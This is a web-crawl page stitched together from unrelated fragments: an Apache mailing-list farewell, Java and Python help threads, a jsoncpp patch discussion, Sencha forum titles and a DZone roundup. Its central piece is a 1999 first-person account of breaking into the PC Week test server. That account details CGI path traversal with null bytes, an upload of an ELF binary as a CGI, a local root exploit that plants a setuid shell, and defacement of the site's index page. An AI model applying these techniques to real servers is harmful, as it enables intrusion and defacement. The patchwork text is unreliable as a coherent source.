The rest is history: I started patching JServ in 1997, then got involved
in the community and proposed significant changes to the codebase that
made me release coordinator for JServ 1.0. Here, Brian invited me to
ApacheCON 98 and Pier followed me: we made two speeches.
In one of those speeches, I met Eric Prud'hommeaux ([email protected]) [sorry
for the probable mispelling of your last name, dude, but I can't look it
up right now since I'm offline] who introduced me into the fantastic
world of XML and RDF. It was October 1998. The real thing that shocked
me, back then, was the concept of "namespaces" they were yet to
formalize. But it was still nothing useful in my technological vision so
I placed it aside.
Before coming back, we joined Jon and Brian at Sun to talk about their
donation of the JSDK to Apache. It was the first metting between Apache
and Sun, the name of the meeting room was "jakarta" :)
On the way back, Pier and I had the concept of "mailets", then, back
home, proposed the creation of the JAMES project and proposed to the
servlet expert group (lead by James Davidson at that time) the extension
of the Servlet API into the mail world. They rejected the concept but
the JAMES project was started written by Federico with some help from
us.
But writing another java server, we understood that many things were
always the same and could be reused: we spent 6 months on our
whiteboards to come up with something that later became known as
"Avalon".
The year later, 1999, java.apache.org grew from being the home of JServ
to a full repository of many different projects.
Jon, Pier and I were proposed for ASF membership for our work on
java.apache.org and accepted.
Also, Jon and I wrote the scripts that generated the web site out of CVS
respositories automatically, but needed something better. I printed out
the XML and the XSL spec and when to the alps for XMas with my
girlfriend. I couldn't sleep and started reading those specs, then I got
the idea of server side pipelines of filtering components passing XML.
The TV was showing the movie Cocoon.
If you are reading this, you probably know the rest so let's cut the
crap :)
Final words: I've spent 5 years of my life around Apache. It's about 20%
of my entire life. I didn't enjoy every minute of it, but I did enjoy
every new thing I learned and every person I met.
Software is the excuse for being here, but the real thing is learning
and having the chance to meet wonderful people that I could not find
down the road.
I owe everything I am to the friends that helped me during my Apache
journey: Federico Barbieri, Pierpaolo Fumagalli, Fabrizio Rovelli, Jon
Stevens, Brian Behlendorf, James Davidson, Donald Ball, Ricardo Rocha,
Giacomo Pati, Roy Fielding, Sam Ruby, and thousands of others.
Apache is recognized as the place where good software get written, but
it's much more: it's a place where a person gets helped to fix his/her
own problems by using software writing as an excuse.
I'm a better person than I used to be: this is all that matters and this
is what my "@apache.org" mail address means to me.
This is what the "Apache spirit" is. Don't let anything, not even
software, interfere with this.
Take care :)
-- | http://mail-archives.apache.org/mod_mbox/cocoon-dev/200111.mbox/%[email protected]%3E | CC-MAIN-2016-44 | refinedweb | 2,099 | 68.6 |
Hello all! My first post here
I've started teaching myself Java and at the moment am making a really simple number sorter to sort an array in ascending order. As far as I'm aware I have the number sorting bit down and amusingly the thing I'm stuck on is getting the new sorted array to print. I'm trying to do it via loops rather than the prebuilt Java classes as I really want to get a proper grasp of loops before I move on. Anyways I'm getting 15 compile errors at the mo (won't post them here as they are really long) and they are all for my print loop. If anyone could have a look at my code and tell me what's up it would be much appreciated!
Thanks
Native
import java.io.*;

class SortAsc
{
    public static void main ( String agrs[] )
    {
        int A[]={8,9,3,10};
        int i,k;

        for(i=0;i<4;i++)
        {
            for(k=0;k<4;k++)
            {
                if (A[k]<A[i])
                {
                    int temp;
                    temp = A[k];
                    A[k] = A[i];
                    A[i] = temp;
                }
            }
        }
    }

    int l;
    for(l=0;l<4;l++)
    {
        System.out.print(A[l]);
    }
}
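For what it's worth, a corrected sketch of the above (assumptions: the print loop is moved inside main, since statements can't sit directly at class level — which is what those compile errors are about — the inner loop starts at i + 1 so the swaps come out ascending, and the sort is pulled into a small helper method purely to keep things tidy):

```java
class SortAsc {
    // Exchange sort, ascending: compare a[i] against every later element
    // and swap whenever a smaller value is found after position i.
    static int[] sort(int[] a) {
        for (int i = 0; i < a.length; i++) {
            for (int k = i + 1; k < a.length; k++) {
                if (a[k] < a[i]) {
                    int temp = a[k];
                    a[k] = a[i];
                    a[i] = temp;
                }
            }
        }
        return a;
    }

    public static void main(String[] args) {
        int[] a = sort(new int[] {8, 9, 3, 10});
        // The print loop now lives inside main, not at class level.
        for (int l = 0; l < a.length; l++) {
            System.out.print(a[l] + " ");   // prints: 3 8 9 10
        }
        System.out.println();
    }
}
```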
How do I install Python? I just want to activate the one already installed (I haven't installed anything; the Wiki said DreamHost already has it installed). Thanks
Python is installed at /usr/bin/python. What do you want to do with it?
emufarmers.com
Very little to do with either emus or farmers!
I'm just trying to get a Python script to work…
I think Emufarmers was trying to tell you that python should already be on your path and ready to go. There should be no need to install another copy.
typing “python” at the login prompt I’m greeted with "Python 2.3.5
Any chance you could show us the first couple of lines of your script? This would allow us to help you a lot more.
(Theory, your “shebang” #! does not point to the installed version of python)
Wholly - Use promo code WhollyMindless for full 97$ credit. Let me know if you want something else!
"
#!/usr/bin/python
def main():
    print "Content-type: text/html"
    print
    print ""
    print "Hello World from Python"
    print ""
    print "Standard Hello World from a Python CGI Script"
    print ""

if __name__ == "__main__":
    main()
"
Without the "s of course. It should be already installed so what am I doing wrong lol(thats from the dreamhost wiki) | https://discussion.dreamhost.com/t/python-install-help/42121 | CC-MAIN-2018-09 | refinedweb | 214 | 82.24 |
The QtLockedFile class extends QFile with advisory locking functions. More...
#include <QtLockedFile>
Inherits QFile.
The QtLockedFile class extends QFile with advisory locking functions.
A file may be locked in read or write mode. Multiple instances of QtLockedFile, created in multiple processes running on the same machine, may have a file locked in read mode. Exactly one instance may have it locked in write mode. A read and a write lock cannot exist simultaneously on the same file.
The file locks are advisory. This means that nothing prevents another process from manipulating a locked file using QFile or file system functions offered by the OS. Serialization is only guaranteed if all processes that access the file use QLockedFile. Also, while holding a lock on a file, a process must not open the same file again (through any API), or locks can be unexpectedly lost.
The lock provided by an instance of QtLockedFile is released whenever the program terminates. This is true even when the program crashes and no destructors are called.
This enum describes the available lock modes.
Constructs an unlocked QtLockedFile object. This constructor behaves in the same way as QFile::QFile().
See also QFile::QFile().
Constructs an unlocked QtLockedFile object with file name. This constructor behaves in the same way as QFile::QFile(const QString&).
See also QFile::QFile().
Destroys the QtLockedFile object. If any locks were held, they are released.
Returns true if this object has a in read or write lock; otherwise returns false.
See also lockMode().
Obtains a lock of type mode. The file must be opened before it can be locked.
If block is true, this function will block until the lock is aquired. If block is false, this function returns false immediately if the lock cannot be aquired.
If this object already has a lock of type mode, this function returns true immediately. If this object has a lock of a different type than mode, the lock is first released and then a new lock is obtained.
This function returns true if, after it executes, the file is locked by this object, and false otherwise.
See also unlock(), isLocked(), and lockMode().
Returns the type of lock currently held by this object, or QtLockedFile::NoLock.
See also isLocked().
Opens the file in OpenMode mode.
This is identical to QFile::open(), with the one exception that the Truncate mode flag is disallowed. Truncation would conflict with the advisory file locking, since the file would be modified before the write lock is obtained. If truncation is required, use resize(0) after obtaining the write lock.
Returns true if successful; otherwise false.
See also QFile::open() and QFile::resize().
Releases a lock.
If the object has no lock, this function returns immediately.
This function returns true if, after it executes, the file is not locked by this object, and false otherwise.
See also lock(), isLocked(), and lockMode(). | http://doc.qt.nokia.com/solutions/4/qtlockedfile/qtlockedfile.html | crawl-003 | refinedweb | 479 | 69.07 |
An analysis of the PC Week Crack of an Apache Web Server running on Red Hat. An extremely interesting article to read, describing in detail how a cgi on the box was exploited. An application of the excellent article by rain forest puppy on manipulating perl in Phrack 55 (a must read).
a65f213ea935f93e75f4326a86a6fc2c
SOURCE: <>
A practical vulnerability analysis
(The PcWeek crack)
By Jfs
First.
lemming:~# telnet securelinux.hackpcweek.com 80
Trying 208.184.64.170...
Connected to securelinux.hackpcweek.com.
Escape character is '^]'.
POST X HTTP/1.0
HTTP/1.1 400 Bad Request
Date: Fri, 24 Sep 1999 23:42:15 GMT
Server: Apache/1.3.6 (Unix) (Red Hat/Linux)
(...)
Connection closed by foreign host.
lemming:~#...)
After no results, I tried to find out what the website structure was, gathering information from the HTML pages, I found out that the server had this directories under the DocumentRoot of the website:
/
/cgi-bin
/photoads/
/photoads/cgi-bin
So I got interested in the photoads thingie, which seemed like an installable package to me. After some searching on the WWW I found out that photoads was a commercial CGI package from "The Home Office Online"
(). It sells for $149, and they grant you access to the source code (Perl), so that you can check and modify it.
I asked a friend if he would let me gave a look at his photoad installation
and this is how I got access to a copy of what could be running in the securelinux machine.
I checked the default installation files and I was able to retrieve the ads database (stored in the) with all the user passwords for their ads. I also tried to access the configuration file /photoads/cgi-bin/photo_cfg.pl but because of the server setup I couldn't get it.
I got the /photoads/cgi-bin/env.cgi script (similar to test-cgi) to give me details of the server such as the location in the filesystem of the
DocumentRoot (/home/httpd/html) apart from other interesting data (user the
server runs as, in this case nobody).
So, first things first, I was trying to exploit either SSI (Server side includes) or the mod_perl HTML-embedded commands, which look something like:
<!--#include file="..."--> for SSI
<!--#perl ...--> for mod_perl
The scripts filtered thsi input on most of the fields, through a perl regexp that didn't leave you with much room to exploit. But I also found a user assigned variable that wasn't checked for strange values before making it into the HTML code, which will let me embed the commands inside the HTML for server side parsing:
In post.cgi, line 36:
print "you are trying to post an AD from another URL:<b> $ENV{'HTTP_REFERER'}\n";
The $ENV{'HTTP_REFERER'} is a user provided variable (though you have to know a bit of how HTTP headers work in order to get it right), which will allow us to embed any HTML into the code, regardless of what the data looks like.
Refer to the files getit.ssi and getit.mod_perl for the actual exploit.
To exploit it, do something like:
lemming:~# cat getit.ssi | nc securelinux.hackpcweek.com 80
But unfortunately, the host didn't have SSI nor mod_perl configured, so I
hit a dead end.
I decided to find a hole in the CGI scripts. Most of the holes in perl scripts are found in open(), system() or `` calls. The first allows reading, writing and executing, while the last two allow execution.
There were no occurrences of the last two, but there were a few of the open() call:
lemming:~/photoads/cgi-bin# grep 'open.*(.*)' *cgi | more
advisory.cgi: open (DATA, "$BaseDir/$DataFile");
edit.cgi: open (DATA, ">$BaseDir/$DataFile");
edit.cgi: open(MAIL, "|$mailprog -t") || die "Can't open $mailprog!\n";
photo.cgi: open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
photo.cgi: open ( FILE, $filename );
(...)
There was nothing to do with the ones referring to $BaseDir and $DataFile as these were defined in the config file and couldn't be changed in runtime.
Same for the $mailprog.
But the other two lines are juicier...
In photo.,cgi, line 132:
$write_file = $Upload_Dir.$filename;
open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
print ULFD $UPLOAD{'FILE_CONTENT'};
close(ULFD);
So if we are able to modify the $write_file variable we will be able write to any file in the filesystem. The $write_file variable comes from:
$write_file = $Upload_Dir.$filename;
$Upload_Dir is defined in the config file, so we can't change it, but what about $filename?
In photo.cgim line 226:
if( !$UPLOAD{'FILE_NAME'} ) { show_file_not_found(); }
$filename = lc($UPLOAD{'FILE_NAME'});
$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;
if ($filename =~ m/gif/) {
$type = '.gif';
}elsif ($filename =~ m/jpg/) {
$type = '.jpg';
}else{
{&Not_Valid_Image}
}
So the variable comes from $UPLOAD{'FILE_NAME'} (extracted from the variables sent to the CGI by the form). We see a regexp that $filename must match in order to help us get where we want to get, so we can't just sent any file we want to, e.g. "../../../../../../../../etc/passwd", cos it will get nulled out by the substitution :
$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;
We see, if the $filename matches the regexp, it's turned to ascii 1 (SOH).
Apart from this, $filename must contain "gif" or "jpg" in its name in order
to pass the Not_Valid_Image filter.
So, after playing a bit with various approaches and with a bit of help from
Phrack's last article on Perl CGI security we find that
/jfs/\../../../../../../../export/www/htdocs/index.html%00.gif
should allow us to refer to the index.html file (the one we have to modify, the main page in the web server).
But then, in order to upload we still need to fool some more script code...
We notice that we won't be able to fool the filename if we send the form in
a POST (the %00 doesn't get translated), so we are left out with only a GET.
In photo.cgi, line 256, we can see that some checks are done in the actual content of the file we just uploaded (:O) and that if the file doesn't comply with some specifications (basically width/length/size) of the image (remember, the photo.cgi script was supposed to be used as a method to upload a photoad to be bound to your AD). If we don't comply with these details the script will delete the file we just uploaded (or overwritten), and that's not what we want (at least not if we want to leave our details somewhere in the server :).
PCWeek has the ImageSize in the configuration file set to 0, so we can forget about the JPG part of the function. Let's concentrate on the GIF branch:
if ( substr ( $filename, -4, 4 ) eq ".gif" ) {
open ( FILE, $filename );
my $head;
my $gHeadFmt = "A6vvb8CC";
my $pictDescFmt = "vvvvb8";
read FILE, $head, 13;
(my $GIF8xa, $width, $height, my $resFlags, my $bgColor, my $w2h) = unpack $gHeadFmt, $head;
close FILE;
$PhotoWidth = $width;
$PhotoHeight = $height;
$PhotoSize = $size;
return;
}
and in photo.cgi, line 140:
if (($PhotoWidth eq "") || ($PhotoWidth > '700')) {
{&Not_Valid_Image}
}
if ($PhotoWidth > $ImgWidth || $PhotoHeight > $ImgHeight) {
{&Height_Width}
}
So we have to make the $PhotoWidth less than 700, different from "" and smaller than ImgWidth (350 by default).
So we are left with $PhotoWidth != "" && $PhotoWidth < 350 .
For $PhotoHeight it has to be smaller than $ImgHeight (250 by default).
So, $PhotoWidth == $PhotoHeight == 0 will do for us. Looking at the script that gets the values into those variables, the only thing we have to do is to set the values in the 6th to 9th byte to ascii 0 (NUL).
We make sure that we put our FILE_CONTENT to comply with that and proceed with the next problem in the code...
chmod 0755, $Upload_Dir.$filename;
$newname = $AdNum;
rename("$write_file", "$Upload_Dir/$newname");
Show_Upload_Success($write_file);
Argh!!! After all this hassle and the file gets renamed/moved to somewhere we don't want it to be :(
Checking the $AdNum variable that gives the final location its name we see that it can only contain digits:
$UPLOAD{'AdNum'} =~ tr/0-9//cd;
$UPLOAD{'Password'} =~ tr/a-zA-Z0-9!+&#%$@*//cd;
$AdNum = $UPLOAD{'AdNum'};
Anything else gets removed, so we can't play with the ../../../ trick in here anymore :|
So, what can we do? The rename() function expects us to give him two paths, the old one and the new one... wait, there is no error checking on the function, so if it fails it'll just keep on processing the next line. How can we make it fail? using a bad file name. Linux kernel has got a restriction on how long a file can be, defaults to 1024 (MAX_PATH_LEN), so if we can make the script rename our file to something longer than 1024 bytes, we'll have it! :)
So, next step we pass it a _really large_ AD number, approximately 1024 bytes long.
Now, the script won't allow us to process the script as it only allows us to post photos for ADs number that do exist... and it will take us a hell of a lot of time to create taht many messages in the board 10^1024 seems quite a long time to me :)
So... another dead end?
Nah, the faulty input checking functions let us create an add with the number we prefer. Just browse through the edit.cgi script and think what will happen if you enter a name that has a carriage return in between, then
a 1024 digits number? :) We got it...
Check the long.adnum file for an exploit that gets us the new ad created.
So, after we can fool the AdNum check, the script makes what we do, that is:
Create/overwrite any file with nobody's permissions, and with the contents
that we want (except for the GIF header NULs).
So, let's try it
Check the overwrite.as.nobody script that allows us to do that.
So far so good. So, we adjust the script to overwrite the index.html web page... and it doesn't work. Duh :(
It's probably that we didn't have the permission to overwrite that file (it's owned by root or it's not the right mode to overwrite it). So, what do we do now? Let's try a different approach...
We try to overwrite a CGI and see it we can make it run for us :) This way we can search for the "top secret" file and we'll get the prize anyway :)
We modify the overwrite script, and yes, it allows us to overwrite a CGI! :)
We make sure we don't overwrite any important (exploit-wise) CGI and we choose the advisory.cgi (what does it do anyway? :)).
So, we will upload a shell script that will allow us to execute commands, cool...
But then, when you run a shell script as a CGI, you need to specify the
shell in the first line of the script, as in:
#!/bin/sh
echo "Content-type: text/html"
find / "*secret*" -print
And remember, our 6th, 7th, 8th and 9th bytes had to be 0 or a very small value in order to comply with the size specifications...
#!/bi\00\00\00\00n/sh
That doesn't work, the kernel only reads the first 5 bytes, then tries to execute "#!/bi"... and as far as I know there is no shell we can access that fits in 3 bytes (+2 for the #!). Another dead end...
Looking at an ELF (linux default executable type) binary gives us the answer, as it results that those bytes are set to 0x00, yohoo :)
So we need to get an ELF executable into the file in the remote server. We have to url-encode it as we can only use GETs, not POSTs, and thus we are limited to a maximum URI length. The default maximum URI length for Apache is 8190 bytes. Remember that we had a _very long_ ad number of 1024 characters, so we are left with about 7000 bytes for our URL-encoded ELF program.
So, this little program:
lemming:~/pcweek/hack/POST# cat fin.c
#include <stdio.h>
main()
{
printf("Content-type: text/html\n\n\r");
fflush(stdout);
execlp("/usr/bin/find","find","/",0);
}
compiled gives us:
lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 4280 Sep 25 04:18 fin*
And stripping the symbols:
lemming:~/pcweek/hack/POST# strip fin
lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 2812 Sep 25 04:18 fin*
lemming:~/pcweek/hack/POST#
Then URL-encoding it:
lemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
-rw-r--r-- 1 root root 7602 Sep 25 04:20 fin.url
Which is TOO large for us to use in our script :(
so, we edit the binary by hand using our intuition and decide to delete everything after the "GCC" string in the executable. It's not a very academic approach and probably it'll pay to check the ELF specifications, but hey, it seems to work:
lemming:~/pcweek/hack/POST# joe fin
lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 1693 Sep 25 04:22 fin*
lemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
-rw-r--r-- 1 root root 4535 Sep 25 04:22 fin.url
lemming:~/pcweek/hack/POST#
Now, we incorporate this into our exploit, and run it...
Check the file called get.sec.find in the files directory for more info.
Also there you will find the to_url script and some .c files with basic commands to run along with their URL translations and finished exploits.
So, we upload the CGI, and access it with our favorite browser, in this case:
wget
Which gives us a completed find / of the server :)
Unfortunately, either the "top secret" file is not there, or it is not accessible by the nobody user :(
We try some more combinations as locate, ls and others, but no traces of the "top secret" file.
[ I wonder where it was after all, if it ever existed ]
So, time to get serious and get root. As a friend of mine says, why try to reinvent the wheel, if it's already there. So with our data about the server
(Linux, i386 since my computer is an i386 and the ELFs ran as a charm...) we grep the local exploit database and find a nice exploit for all versions of RH's crontab.
Available on your nearest bugtraq/securityfocus store :) kudos to w00w00 for this
We modify it to tailor our needs, as we won't need an interactive rootshell, but to create a suidroot shell in some place accessible by the user nobody.
We tailor it to point to /tmp/.bs. We upload the CGI again, run it with our browser, and we are ready to see if the exploit runs fine.
We make a CGI that will ls /tmp and yeah, first try and we have the suitroot waiting for us :)
We upload a file to /tmp/xx with the modified index.html page.
Time to make a program that will run:
execlp("/tmp/.bs","ls","-c","cp /tmp/xx /home/httpd/html/index.html",0);
And at this point the game is over :)
It's been around 20hours since we started, good timing 8)
We then upload and copy our details to a secure place where nobody will see them, and post a message in the forum waiting for replies :)
( Download PCWEEK.ZIP to get the xploits and scripts used. )
Jfs - !H'99
[email protected] | http://packetstormsecurity.org/files/16083/jfs_pcweek.txt.html | crawl-003 | refinedweb | 2,611 | 72.16 |
- html template and update function problem ?
- ref Config option Equivalent
- Last list item overlapped with tabpanel's bottom bar
- Form Scrolling Problem
- Date objects not displaying on Android
- Need Help for other for getting started work on snecha Touch
- Show and Hide Docked Items.
- Toolbar does not slides with the content (blue layer appears over it)
- Problems with Panel
- datepickerfield without year slot?!?
- The problem about icons that link me to other panel
- Event delegation, same event different delegates
- Android - supported devices
- Public Events on API Docs
- showing loader while loading store
- placing html content help
- How can I use a chart code in demo app?
- How to load external web page in Tab
- SenchaTouch Themes - how to change color of placeHolder in textfield?
- Client Cached or Buffered AjaxProxy
- updating select width on label content changed
- XTemplate and Custom Component (radiogroup)
- Data not display in list
- Best way to pass data from a list to a panel
- MVC + Login
- Touch Framework, gyroscope and gps....
- Infinite Carousel with Sencha Touch 1.0
- Vertical ProgressBar in Extjs
- Sencha Touch on Blackberry Playbook?
- Designing a layout
- data not display in list from server
- HiddenField not posting value?
- Change Background Color of FormPanel
- Strange problem....please help
- How to get Model's Field value
- Ext.Panel - resize and bodyresize events never fire
- Ext.Panel - resize and bodyresize events never fire
- A little help loading a simple form
- ScriptTag and server-defined callback key.. help!
- Sencha Touch and url scheme ???
- Ux.util.Format.addCommas
- Element getBottom() returns 0
- Job Opening
- Adding multiple registered types to panel stacks one on top of each other
- Multi page site
- Multitouch Zoom
- Accessing Json data above root
- Adding/removing sublist elements
- SSL Form?
- Adding a record at the leaf node of nestedlist
- Ext.list item height for menu navigation
- list detail page?
- How to disable file upload field and file upload icon
- Scrolling after panel.update not working
- Load Model after Standar From Submit.
- Use of getNodeById() with jsontree
- Associations and XTemplates
- Grouped Nested List?
- Packaging Sencha app for iPhone
- Read multiple lists with Json
- Looking for the right property / Up. - Down Slider
- Carousel example inside a Tabpanel.
- load new panel on carousel click
- phonegap orientation example and question
- icon images not appearing when connected via 3G
- Add Items to Panel
- Running Sencha Touch - Getting Blank Page
- Load Multiple Models using Store.
- Form/Post list data
- Load RSS/Atom Data Using Google API
- Tapping a Ext.Button while in Airplane mode blackens screen
- How to style components: themes, ui, where I can find examples/tutorials/guide?
- server side json data is not getting loaded into TouchGridPanel
- Will sencha touch include the ExtJS4 charts ?
- Why does the LoadMask inject HTML? Why not let Element.mask do that?
- Is there a autocomplete with comboxbox control?
- Model Association does not work in case of xml
- All Picto icons available on Toolbar?
- Developing with Sencha Touch and Phone Gap using Windows
- updating only new members of has_many assocation
- Update NestedList
- Stores & mapping fields that can be null
- Terminal TouchScreen Applications
- Can anyone help with disabling or removing the automatic Orientation Change?
- Events in gridpanel
- How to run sencha touch codes in phonegap framework using ECLIPSE IDE?
- Alignment of buttons in tabbar
- Can I have a "popup" panel opened on clicking a button?
- DataView requires tpl, store and itemSelector configurations to be defined.
- Style an Ext.Template depending on value
- Swiping too fast on Carousel
- Change list index letters to whole value
- XTemplate access global variable or js function from within 'if='?
- Manually Set Selected Item look inTabBar?
- Obtaining a reference to a field
- Save and Get custom data from store
- Adding loadMask to a gridpanel...
- Tooltip
- Awesome MVC Tutorial (+ PhoneGap Integration) by James Pearce
- draggable and droppable list items?
- iPhone album view
- Foursquare API and Sencha Touch
- Capture customer's signature with Sencha Touch (and Phonegap)?
- panel as a leaf in nestedlist
- Ajax Question.
- Can't see data
- WebStorageProxy issue
- Ext.Toolbar items not showing up
- Displaying html formatted code by creating link from the sink navigation structure
- Can you put a list inside a carousel?
- CRUD
- NestedList cancel itemtap event not working...
- Tabs not removed from TabBar when associated card destroyed
- Theming Issue
- Stop Orientation Change
- Database record List View (sencha touch+phonegap)
- card layout in landscape + phonegap problem
- AjaxProxy on failure
- carousel2 modifications ?
- CardLayout combined with List/OnItemDisclosure
- syntax for combining 2 ui styles for buttons
- Can you active a tab by clicking on an item in a carousel?
- namespace
- How to disable buttons in an Ext.TabPanel?
- Animating (fadeout) background color - highlight() method
- List rendering race condition
- Event for TextField's clear?
- Model.load not sending id, loading all models
- Using sencha touch with appcelerator?
- Can anyone help with setActiveItem method?
- navigation via button
- Select not working on Android and iPhone
- CardLayout combined with List/OnItemDisclosure
- get the device screen width and heigth?
- Store paging functions
- Charting with Sencha Touch?
- how hide loadmask when list is loaded....
- list 'hiccup' on mouseup event
- Handset/Phone recommendation
- Flexible TabPanels
- Even Odd list View
- Waiting for Store in Sencha Touch
- Sencha contact form
- Newbie question: display local json data in a panel
- Conditional fields validations
- [Newbie Question] Displaying JSON data after form submission
- Problem to add Ext.List into Ext.TabPanel.
- XTemplate syntax
- Credit Card Reader?
- Carousel with Embedded YouTube Video Problem
- Mapping XML elements that are prefixed
- refused to set unsafe header authorization
- Creating buttons on Sheet from JSON source
- App Needed
- Adding Class over the list
- Right to Left problem <html dir="rtl">
- Store Filter Date Range
- Pushing the SASS theming envelope
- Capturing tab change in TabPanel
- console.log is not printing anything
- Form element performance on Android and iPhone
- NestedList: dinamic change store
- Can you dymanically edit the dockedItems?
- Custom Layout Examples
- Touch API Viewer search returns ExtJS classes?
- .NET MVC 2 Issue
- Read 2 XMLs using Sencha
- how to print debug message?
- Double Prompt?
- sencha commandline tool not working?
- NestedList Root -> DetailCard
- Remove Toolbar from NestedList
- Create hidden search field on to of a list
- Textarea that automatically expand
- complex models
- touchstyle.mobi not working on samsung galaxy tab
- Bug? mask on tapping a bottom tabbar tab label
- How to disable Retina pixel doubling on mobile i-device (force 1-to-1 pixel ratio)?
- onItemDisclosure in NestedList
- SASS & Sencha Touch: how do I apply a gradient to a pressed list item?
- Newbie Question on Sencha touch framework
- Event bubbling from Panel to Container
- form.Select on Android 2.2 not working.
- Ext.data.Store Not Populated with scripttag proxy result
- Nestedlist from external JSON location
- Transition question, please just talk me through it
- Dynamically Changing attribute values
- Calendar Picker/Chooser
- NestedList get the parent id of a leafitem
- Compatibility with Android??? Bad experience...
- Validations
- Extend TabPanel to introduce new properties
- Load record into form via REST
- Save and Load a Store with different URLs?
- Change Button Color with Javascript
- Panel does not resize after hiding toolbar docked at the bottom
- Re-rendering ".add"ed components
- Items inside TabPanel card/tab not rendered in Android emulator
- What's the best way to do Alternating Line styles in a Ext.List?
- Following Tommys MVC vid, no application property on the controller
- Is an <iframe> that scrolls possible in a Carousel?
- getGroupString property with HTML?
- List not scrolling
- Problems with the getting startet project
- Problem with scroll to top in Ext.panel with input type="text". Is it a bug?
- Problem with scrollToTop with input form on iPad with keyboard on screen. Is it bug?
- DataView's bindStore()
- Best practice to implement this Design.
- Problems with JSONP
- Best way to dynamically create panels with data from store?
- record passed in getDetailCard - where am I going wrong?
- Better alternatives to "compass watch"
- DatePickerField with date from store ?
- Going Back on Nestedlist, refresh needed?
- detailedCard doesn't disappear when Back button is pressed
- Trouble implementing with Ext.Application
- Slide until certain part of the screen
- Custom SASS build file breaks back button UI
- DataView.bindStore doesn't work correctly
- MVC-Tutorial with PhoneGap
- PhoneGap Tutorial and iPad
- how to use the setActiveItem method of Cardlayout??????
- Connection strength assessment
- Display Bottom bar on screen tap
- Device compatabilty info
- Lost in Ext.extend ... where am I ...?
- Lost in Ext.extend ... where am I ...?
- seems like "Preview Post" does not work
- Image loading spinner
- Sencha Touch and PhoneGap problem with builds - Xcode not referencing changes
- Trouble with Twitter app
- Wiring up views in tabs
- Items inside carousel don't scroll
- Broken link in Sencha tutorial
- Sencha MVC Tutorial has broken link to source code zip file
- Drag and Drop multiple targets
- What should I do to use Persistance.js with Sencha Touch models
- Dataview and multiselect not working?
- Not sure why my subclassed control is only showing up once.
- Event Delegates for Multiple Elements in a List Row
- Toolbar trickery
- Ext.List Object Inside of Ext.Panel Won't Render Unless Orientation Changes
- Please. Basic question, how to show a fullscreen panel from a list click?
- How to play youtube video using Ext.Video component?? | http://www.sencha.com/forum/archive/index.php/f-55-p-15.html?s=68ce2f7d863026d5e357c6017aa76c8a | CC-MAIN-2014-35 | refinedweb | 1,508 | 56.86 |
I am trying to add seller_id to my items model in a migration by doing the following:
rails g model Item title:string description:text price:bigint status:integer published_date:datetime seller:belongs_to
class CreateItems < ActiveRecord::Migration
def change
create_table :items do |t|
t.string :title
t.text :description
t.bigint :price
t.integer :status
t.datetime :published_date
t.belongs_to :user, index: true, foreign_key: true
t.timestamps null: false
end
end
end
Just explicitly define what you want in the migration file and add the necessary relation to your model, instead of t.belongs_to you could just use:
t.integer :seller_id, index: true, foreign_key: true
and in your models you could go about this a few ways, if you also want reference your relation as seller on item instances then in the Item class make the relation:
belongs_to :seller, class_name: 'User'
and in the User class:
has_many :items, foreign_key: :seller_id
or if you want to reference it as user from the items then:
belongs_to :user, foreign_key: :seller_id
In terms of editing the generator, that is the default way that a model generator works and in my opinion I like to keep the defaults the way they are. However I do recommend creating your own rails generators or your own rake tasks for when you want to create some custom / special case stuff. For looking at creating your own generator I would point you to the ruby on rails official guide for creating generators to get you started: | https://codedump.io/share/va39lz1s8XoS/1/rails-migration-tbelongsto-user-add-custom-column-name-sellerid | CC-MAIN-2017-30 | refinedweb | 247 | 51.89 |
This is a patch for the bug "Incorrect parsing of strings with null characters (\u0000) - ID: 3525583".
It basically includes the length of a string in Json::Value as part of the union, and in value and writer either the the pair (char*, length) or the c++ string are used.
It also modifies the writer to write \0 as \u0000.
The end result is that you can parse strings like "NUL: \u0000 end" which will return:
* Json::Value::asString() returns "NUL: \0 end" (stringn actually containing a \0 character
* Is written (writer.write or toStyledString) escaping the \u0000 character.
We're using this for JSONs containing blobs of binary data and it seems to work fine.
Please let me know where it'd best to add some tests for it - I'd more than happy to take a closer look at that.
The patch is done against 0.6.0-rc2 (r191).
Let me know what you think - Hopefully you can include this in the code :)
Stefan Wehner
2013-04-05
Mike Gelfand
2014-01-25
Great patch, Stefan. One issue though, you have lost reverse solidus escaping, so additional condition should be added to
isCharacterToEscape to make it look like
static bool isCharacterToEscape(char ch)
{
return ( ch >= 0 && ch <= 0x1F ) || ( ch == '\"' ) || ( ch == '\' );
}
There also were some changes (using r275 now) which prevent clean patch application, but nothing one couldn't deal with.
Mike Gelfand
2014-02-04
The patch I'm currently using could be found at (against r276).
Christopher Dunn
2015-03-06
As of versions
1.5.0 and
0.9.0, UTF-8 with nulls is now supported at:
Please let us know if you see a problem. We were not able to accept the patch because we had to maintain binary-compatibility. Nice work though.
Christopher Dunn
2015-03-06 | http://sourceforge.net/p/jsoncpp/patches/18/ | CC-MAIN-2015-27 | refinedweb | 305 | 71.95 |
DZone Weekly Link Roundup (April 30)
DZone Weekly Link Roundup (April 30)
Join the DZone community and get the full member experience.Join For Free
The State of API Integration 2018: Get Cloud Elements’ report for the most comprehensive breakdown of the API integration industry’s past, present, and future.
NEWS
NoSQL Meets Bitcoin and Brings Down Two Exchanges: The Story of Flexcoin and Poloniex/
Flex.
A Performance Comparison Between Java and C on the Nexus 5.
Introducing the OpenStack SDK for PHP
This is a proposed OpenStack project that is designed to improve the experience of OpenStack end-users who are using the PHP programming language by providing them with everything they need to develop applications against OpenStack. The primary target for this package is application developers who develop against OpenStack. This does not include those who develop OpenStack itself or operate it. These are developers looking to consume a feature-rich OpenStack Cloud with its many services. These Developers require a consistent, single namespace API ("Application Programming Interface") that allows them to build and deploy their application with minimal dependencies.
GENERAL
On Languages, VMs, Optimization, and the Way of the.
Design a Better SQL Database With Database Normalization.?
HUMOR
Sh*t Programmers Say
Here's a hint at the joke: programmers don't say anything! How dare they sit there in all their smug productivity.
How to Make a Good Code Review
NERDY
